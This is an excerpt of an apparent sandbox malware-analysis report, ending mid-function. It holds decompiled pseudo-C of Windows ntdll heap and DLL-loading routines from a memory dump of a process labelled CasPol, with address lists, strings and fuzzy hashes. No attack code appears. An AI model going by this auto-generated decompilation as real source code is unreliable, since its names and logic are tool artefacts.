                                                                			E0165AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0167D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1718a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E016696E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E016D3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E016696E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0162B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E016E14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01647D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E016E1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01647D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E016E1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                0x0165ac85
                                                                0x0165ac88
                                                                0x0165ac8a
                                                                0x0165ac8d
                                                                0x0165ac91
                                                                0x0165ac99
                                                                0x0165ac9c
                                                                0x01699f57
                                                                0x01699f5b
                                                                0x01699f60
                                                                0x01699f60
                                                                0x0165aca8
                                                                0x0165acae
                                                                0x0165acda
                                                                0x0165acde
                                                                0x0165ace8
                                                                0x0165aceb
                                                                0x0165acee
                                                                0x00000000
                                                                0x0165acee
                                                                0x0165acf6
                                                                0x0165acb0
                                                                0x0165acb0
                                                                0x0165acbb
                                                                0x0165acbd
                                                                0x0165acc0
                                                                0x0165acc5
                                                                0x0165adae
                                                                0x0165adb4
                                                                0x0165adb4
                                                                0x0165acd4
                                                                0x0165acd8
                                                                0x0165acf9
                                                                0x0165acff
                                                                0x0165ad04
                                                                0x0165ad08
                                                                0x0165ad09
                                                                0x0165ad10
                                                                0x0165ad12
                                                                0x0165ad18
                                                                0x01699f6f
                                                                0x01699f74
                                                                0x01699f76
                                                                0x01699f7c
                                                                0x01699f84
                                                                0x01699f88
                                                                0x01699f89
                                                                0x01699f90
                                                                0x01699f90
                                                                0x01699f76
                                                                0x0165ad1e
                                                                0x0165ad24
                                                                0x0165ad26
                                                                0x0169a097
                                                                0x0169a09b
                                                                0x0169a0ba
                                                                0x0169a0bf
                                                                0x0169a09d
                                                                0x0169a0b2
                                                                0x0169a0b7
                                                                0x0169a0c5
                                                                0x0169a0c8
                                                                0x0169a0cb
                                                                0x0169a0d2
                                                                0x00000000
                                                                0x0165ad2c
                                                                0x0165ad2c
                                                                0x0165ad2f
                                                                0x0165ad34
                                                                0x0165ad36
                                                                0x01699f97
                                                                0x01699f9a
                                                                0x00000000
                                                                0x00000000
                                                                0x01699fa9
                                                                0x0165ad3e
                                                                0x0165ad3e
                                                                0x0165ad41
                                                                0x01699fb3
                                                                0x01699fb9
                                                                0x01699fc0
                                                                0x01699fd0
                                                                0x01699fd0
                                                                0x01699fc0
                                                                0x0165ad4a
                                                                0x0165ad50
                                                                0x0165ad5c
                                                                0x0165ad62
                                                                0x0165ad68
                                                                0x0165ad6b
                                                                0x0165ad6d
                                                                0x01699fda
                                                                0x01699fdd
                                                                0x00000000
                                                                0x00000000
                                                                0x01699fec
                                                                0x00000000
                                                                0x0165ad73
                                                                0x0165ad73
                                                                0x0165ad73
                                                                0x0165ad75
                                                                0x0165ad75
                                                                0x0165ad78
                                                                0x01699ff6
                                                                0x01699ffc
                                                                0x0169a003
                                                                0x0169a00e
                                                                0x0169a010
                                                                0x0169a01b
                                                                0x0169a01b
                                                                0x0169a01b
                                                                0x0169a038
                                                                0x0169a038
                                                                0x0169a003
                                                                0x0165ad84
                                                                0x0165ad89
                                                                0x0165ad8c
                                                                0x0165ad8e
                                                                0x0169a042
                                                                0x0169a045
                                                                0x00000000
                                                                0x00000000
                                                                0x0169a054
                                                                0x00000000
                                                                0x0165ad94
                                                                0x0165ad94
                                                                0x0165ad94
                                                                0x0165ad96
                                                                0x0165ad96
                                                                0x0165ad99
                                                                0x0169a063
                                                                0x0169a065
                                                                0x0169a070
                                                                0x0169a070
                                                                0x0169a070
                                                                0x0169a08d
                                                                0x0169a08d
                                                                0x0165ada4
                                                                0x0165ada6
                                                                0x00000000
                                                                0x0165ada6
                                                                0x0165ad8e
                                                                0x0165ad6d
                                                                0x0165ad3c
                                                                0x0165ad3c
                                                                0x00000000
                                                                0x0165ad3c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165acd8

                                                                Strings
                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0169A0CD
                                                                • HEAP[%wZ]: , xrefs: 0169A0AD
                                                                • HEAP: , xrefs: 0169A0BA
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                • API String ID: 0-1340214556
                                                                • Opcode ID: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                                                                • Instruction ID: 902e2d581f73721d2451329116085639bfbee978e78a3118188295a23d8caecc
                                                                • Opcode Fuzzy Hash: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                                                                • Instruction Fuzzy Hash: 50810632204684EFEB26DBACCD94BA9BBF8FF05314F1442A9E95187392D774E940CB10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0164B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E0164B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E016EA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1718748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0162B150();
					} else {
						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0162B150();
					__eflags =  *0x1717bc8;
					if(__eflags == 0) {
						E016E2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E016EA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1718720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1718720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0164B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E016EA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0164E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                0x0164b746
                                                                0x0164b74b
                                                                0x0164b74d
                                                                0x0164b750
                                                                0x0164b755
                                                                0x0164b758
                                                                0x0164b758
                                                                0x0164b75e
                                                                0x0164b763
                                                                0x0164b764
                                                                0x0164b76a
                                                                0x0164b76d
                                                                0x0164b771
                                                                0x0164b776
                                                                0x0164b85c
                                                                0x0164b85d
                                                                0x0164b860
                                                                0x0164b865
                                                                0x01692ba1
                                                                0x01692ba2
                                                                0x01692ba9
                                                                0x01692bae
                                                                0x01692bae
                                                                0x0164b77c
                                                                0x0164b77c
                                                                0x0164b77c
                                                                0x0164b785
                                                                0x0164b788
                                                                0x01692bb6
                                                                0x01692bb9
                                                                0x00000000
                                                                0x00000000
                                                                0x01692bbf
                                                                0x01692bc5
                                                                0x01692bc9
                                                                0x01692be8
                                                                0x01692bed
                                                                0x01692bcb
                                                                0x01692be0
                                                                0x01692be5
                                                                0x01692bf3
                                                                0x01692bf8
                                                                0x01692bfd
                                                                0x01692c05
                                                                0x01692c0e
                                                                0x01692c0e
                                                                0x00000000
                                                                0x0164b78e
                                                                0x0164b78e
                                                                0x0164b78e
                                                                0x0164b791
                                                                0x0164b791
                                                                0x0164b797
                                                                0x0164b797
                                                                0x0164b79f
                                                                0x0164b7a9
                                                                0x0164b7af
                                                                0x0164b7af
                                                                0x0164b7b1
                                                                0x0164b7b6
                                                                0x0164b7e2
                                                                0x0164b7e2
                                                                0x0164b7e7
                                                                0x0164b880
                                                                0x0164b7ed
                                                                0x0164b7ed
                                                                0x0164b7ed
                                                                0x0164b7ef
                                                                0x0164b7f2
                                                                0x0164b7f2
                                                                0x0164b7f5
                                                                0x0164b7fa
                                                                0x01692c2d
                                                                0x01692c2e
                                                                0x01692c39
                                                                0x0164b800
                                                                0x0164b800
                                                                0x0164b802
                                                                0x0164b805
                                                                0x0164b808
                                                                0x0164b808
                                                                0x0164b80a
                                                                0x0164b80d
                                                                0x0164b816
                                                                0x0164b81c
                                                                0x0164b822
                                                                0x0164b82f
                                                                0x0164b88b
                                                                0x0164b892
                                                                0x0164b897
                                                                0x0164b899
                                                                0x0164b89b
                                                                0x0164b89e
                                                                0x0164b8a5
                                                                0x0164b8a8
                                                                0x0164b8aa
                                                                0x0164b8ac
                                                                0x0164b8ac
                                                                0x0164b8aa
                                                                0x0164b892
                                                                0x0164b831
                                                                0x0164b839
                                                                0x0164b83b
                                                                0x0164b83b
                                                                0x0164b844
                                                                0x0164b84b
                                                                0x0164b852
                                                                0x0164b7b8
                                                                0x0164b7ba
                                                                0x0164b7bf
                                                                0x0164b7c4
                                                                0x01692c18
                                                                0x01692c19
                                                                0x01692c23
                                                                0x0164b7ca
                                                                0x0164b7ca
                                                                0x0164b7cc
                                                                0x0164b7cf
                                                                0x0164b7d1
                                                                0x0164b7d1
                                                                0x0164b7d4
                                                                0x0164b7dc
                                                                0x0164b8bb
                                                                0x0164b8bb
                                                                0x0164b8be
                                                                0x0164b8be
                                                                0x0164b8c1
                                                                0x00000000
                                                                0x00000000
                                                                0x0164b8c3
                                                                0x0164b8c5
                                                                0x0164b8c7
                                                                0x0164b8e0
                                                                0x00000000
                                                                0x0164b8e0
                                                                0x0164b8cc
                                                                0x0164b8cc
                                                                0x00000000
                                                                0x0164b8cc
                                                                0x0164b8d6
                                                                0x0164b8d6
                                                                0x00000000
                                                                0x0164b7dc
                                                                0x0164b7b6

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                                                                • Instruction ID: 6042d5601a79bb971b9eff710753697e2ada9c3e60dfea9785d8f0e11434b3a5
                                                                • Opcode Fuzzy Hash: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                                                                • Instruction Fuzzy Hash: E661B270600241DFEB29DF28CC85B6ABBE6FF44314F19856DE8498B346D770E892CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01637E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E01637E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0163CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0162C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1715780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E016A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1715780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01647D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01647D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E016A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01647D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01647D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E016A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0165A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0162B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                0x01637e4c
                                                                0x01637e50
                                                                0x01637e55
                                                                0x01637e58
                                                                0x01637e5d
                                                                0x01637e71
                                                                0x01637f33
                                                                0x01637e77
                                                                0x01637e77
                                                                0x01637e79
                                                                0x01637e79
                                                                0x01637e7e
                                                                0x01637f45
                                                                0x01689848
                                                                0x00000000
                                                                0x01689848
                                                                0x01637f4e
                                                                0x01637f53
                                                                0x01637f5a
                                                                0x00000000
                                                                0x00000000
                                                                0x0168985a
                                                                0x01689862
                                                                0x01689866
                                                                0x00000000
                                                                0x0168986c
                                                                0x00000000
                                                                0x0168986c
                                                                0x01637e84
                                                                0x01637e84
                                                                0x01637e8d
                                                                0x01689871
                                                                0x01637eb8
                                                                0x01637ec0
                                                                0x01637ec0
                                                                0x01637e9a
                                                                0x0168987e
                                                                0x00000000
                                                                0x00000000
                                                                0x01689884
                                                                0x0168988b
                                                                0x016898a7
                                                                0x016898ac
                                                                0x016898b1
                                                                0x016898b6
                                                                0x016898b8
                                                                0x016898b8
                                                                0x016898b9
                                                                0x00000000
                                                                0x016898b9
                                                                0x01637ea0
                                                                0x01637ea7
                                                                0x00000000
                                                                0x00000000
                                                                0x01637eac
                                                                0x01637eb1
                                                                0x01637ec6
                                                                0x01637ed0
                                                                0x016898cc
                                                                0x01637ed6
                                                                0x01637ed6
                                                                0x01637ed6
                                                                0x01637ede
                                                                0x01637ee3
                                                                0x016898e3
                                                                0x016898f0
                                                                0x01689902
                                                                0x016898f2
                                                                0x016898fb
                                                                0x016898fb
                                                                0x01689907
                                                                0x0168991d
                                                                0x0168991d
                                                                0x01689907
                                                                0x016898e3
                                                                0x01637ef0
                                                                0x01637f14
                                                                0x01637f14
                                                                0x01637f1e
                                                                0x01689946
                                                                0x01637f24
                                                                0x01637f24
                                                                0x01637f24
                                                                0x01637f2c
                                                                0x0168996a
                                                                0x01689975
                                                                0x01689975
                                                                0x0168997e
                                                                0x01689993
                                                                0x01689993
                                                                0x0168997e
                                                                0x00000000
                                                                0x01637ef2
                                                                0x01637efc
                                                                0x01637f0a
                                                                0x01637f0e
                                                                0x01689933
                                                                0x00000000
                                                                0x01689933
                                                                0x00000000
                                                                0x01637f0e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01637eb1

                                                                Strings
                                                                • LdrpCompleteMapModule, xrefs: 01689898
                                                                • minkernel\ntdll\ldrmap.c, xrefs: 016898A2
                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 01689891
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                • API String ID: 0-1676968949
                                                                • Opcode ID: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                                                                • Instruction ID: 7b99ad89cdb24a8f306c764da529a9a409f493f13342ee7a4a52c6fb8a39bb84
                                                                • Opcode Fuzzy Hash: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                                                                • Instruction Fuzzy Hash: 185102B2A04746DBEB26DB6CCD44B2A7BE5FB80314F040AA9E9519B7D1D730ED01CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016D23E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 64%
                                                                			E016D23E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x171874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
